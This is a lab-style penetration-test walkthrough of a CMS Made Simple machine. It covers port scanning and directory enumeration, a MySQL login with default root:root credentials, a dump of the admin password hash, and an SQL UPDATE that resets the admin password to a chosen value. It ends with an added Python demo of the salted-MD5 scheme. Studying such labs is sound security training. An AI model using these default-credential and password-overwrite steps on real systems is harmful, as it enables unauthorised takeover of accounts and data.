PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
| 256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_ 256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home - My CMS
3306/tcp open mysql MySQL 8.0.19
| ssl-cert: Subject: commonName=MySQL_Server_8.0.19_Auto_Generated_Server_Certificate
| Not valid before: 2020-03-25T09:30:14
|_Not valid after: 2030-03-23T09:30:14
| mysql-info:
| Protocol: 10
| Version: 8.0.19
| Thread ID: 56
| Capabilities flags: 65535
| Some Capabilities: SupportsTransactions, ODBCClient, Support41Auth, IgnoreSigpipes, SupportsCompression, Speaks41ProtocolOld, InteractiveClient, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, LongColumnFlag, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: .\x06?2rSLn|n_NIH'\x0E%n(\x05
|_ Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data.
Browsing to the web server shows a CMS Made Simple install, version 2.2.13.
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.158.74 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/admin (Status: 301) [Size: 316] [--> http://192.168.158.74/admin/]
/assets (Status: 301) [Size: 317] [--> http://192.168.158.74/assets/]
/.htpasswd (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/cgi-bin/ (Status: 403) [Size: 279]
/doc (Status: 301) [Size: 314] [--> http://192.168.158.74/doc/]
/index.php (Status: 200) [Size: 19502]
/lib (Status: 301) [Size: 314] [--> http://192.168.158.74/lib/]
/modules (Status: 301) [Size: 318] [--> http://192.168.158.74/modules/]
/phpmyadmin (Status: 401) [Size: 461]
/phpinfo.php (Status: 200) [Size: 90131]
/server-status (Status: 403) [Size: 279]
/tmp (Status: 301) [Size: 314] [--> http://192.168.158.74/tmp/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.158.74/uploads/]
Viewing /phpmyadmin
After browsing a lot of pages and poking at the login form without any luck, I moved on to the MySQL service, since the nmap scan showed it exposed to the network on its default port.
┌──(kali㉿VirtualBox)-[~]
└─$ mysql -h 192.168.158.74 -u root -p
Enter password: root
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 329
Server version: 8.0.19 MySQL Community Server - GPL
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
Surprisingly, it works with the default credentials root:root.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| cmsms_db |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.356 sec)
MySQL [(none)]> use cmsms_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [cmsms_db]> show tables;
+--------------------------------+
| Tables_in_cmsms_db |
+--------------------------------+
| cms_additional_users |
| cms_additional_users_seq |
| cms_admin_bookmarks |
| cms_admin_bookmarks_seq |
| cms_adminlog |
| cms_content |
| cms_content_props |
| cms_content_props_seq |
| cms_content_seq |
| cms_event_handler_seq |
| cms_event_handlers |
| cms_events |
| cms_events_seq |
| cms_group_perms |
| cms_group_perms_seq |
| cms_groups |
| cms_groups_seq |
| cms_layout_design_cssassoc |
| cms_layout_design_tplassoc |
| cms_layout_designs |
| cms_layout_stylesheets |
| cms_layout_templates |
| cms_layout_tpl_addusers |
| cms_layout_tpl_categories |
| cms_layout_tpl_type |
| cms_locks |
| cms_mod_cmsjobmgr |
| cms_mod_filepicker_profiles |
| cms_module_deps |
| cms_module_news |
| cms_module_news_categories |
| cms_module_news_categories_seq |
| cms_module_news_fielddefs |
| cms_module_news_fieldvals |
| cms_module_news_seq |
| cms_module_search_index |
| cms_module_search_items |
| cms_module_search_items_seq |
| cms_module_search_words |
| cms_module_smarty_plugins |
| cms_module_templates |
| cms_modules |
| cms_permissions |
| cms_permissions_seq |
| cms_routes |
| cms_siteprefs |
| cms_user_groups |
| cms_userplugins |
| cms_userplugins_seq |
| cms_userprefs |
| cms_users |
| cms_users_seq |
| cms_version |
+--------------------------------+
53 rows in set (0.305 sec)
MySQL [cmsms_db]> select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| 1 | admin | 59f9ba27528694d9b3493dfde7709e70 | 1 | | | [email protected] | 1 | 2020-03-25 09:38:46 | 2020-03-26 10:49:17 |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
1 row in set (0.296 sec)
Here we found a credential, but the password is stored as a hash, so one option is to look it up at https://crackstation.net/.
However, knowing that it is an MD5 hash (CMS Made Simple hashes the site's `sitemask` preference concatenated with the password), and that we have root access to the MySQL database, we can instead run an UPDATE that replaces the stored hash with one for a password we choose:
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name ='sitemask'),''),'password'))) where username = 'admin';
The result looks like this:
MySQL [cmsms_db]> update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name ='sitemask'),''),'password'))) where username = 'admin';
Query OK, 1 row affected (0.976 sec)
Rows matched: 1 Changed: 1 Warnings: 0
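To make clear why that UPDATE produces a working login, here is an added example (not from the original writeup) that reproduces the hash scheme the query relies on against an in-memory SQLite stand-in for cmsms_db. The table and column names follow the dump above; the sitemask value, the placeholder stored hash and the admin row are constructed for this example.

```python
import hashlib
import sqlite3


def cmsms_hash(sitemask, password):
    """Scheme the UPDATE reproduces: md5(IFNULL(sitemask, '') + password).
    The mask is one value for the whole site, so it behaves as a shared salt,
    not a per-user one: two users with the same password share a hash."""
    mask = sitemask if sitemask is not None else ""
    return hashlib.md5((mask + password).encode()).hexdigest()


def build_demo_db(sitemask):
    """In-memory copy of the two tables the query touches (constructed data)."""
    db = sqlite3.connect(":memory:")
    # SQLite has no md5(); register one so the page's query can run unchanged.
    db.create_function("md5", 1, lambda s: hashlib.md5(s.encode()).hexdigest())
    db.executescript("""
        CREATE TABLE cms_siteprefs (sitepref_name TEXT, sitepref_value TEXT);
        CREATE TABLE cms_users (user_id INTEGER, username TEXT, password TEXT);
        INSERT INTO cms_users VALUES (1, 'admin', '00000000000000000000000000000000');
    """)
    if sitemask is not None:  # a site with no mask set exercises the IFNULL branch
        db.execute("INSERT INTO cms_siteprefs VALUES ('sitemask', ?)", (sitemask,))
    return db


def site_mask(db):
    row = db.execute("SELECT sitepref_value FROM cms_siteprefs "
                     "WHERE sitepref_name = 'sitemask'").fetchone()
    return row[0] if row else None


def reset_admin_password(db, new_password):
    """The page's statement with the literal 'password' parameterised; SQLite
    uses || instead of CONCAT, the logic is otherwise identical."""
    db.execute(
        "UPDATE cms_users SET password = (SELECT md5(IFNULL((SELECT sitepref_value "
        "FROM cms_siteprefs WHERE sitepref_name = 'sitemask'), '') || ?)) "
        "WHERE username = 'admin'",
        (new_password,),
    )
    return db.execute("SELECT password FROM cms_users "
                      "WHERE username = 'admin'").fetchone()[0]


def verify_login(db, username, password):
    """What the CMS login does: recompute the hash and compare with the row."""
    row = db.execute("SELECT password FROM cms_users WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and row[0] == cmsms_hash(site_mask(db), password)
```

Running `verify_login` before and after `reset_admin_password` shows the login flipping from rejected to accepted, and the `modified_date` column in the real table is the one trace such a change leaves behind.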
Now we can go back to the admin login page and log in with admin:password.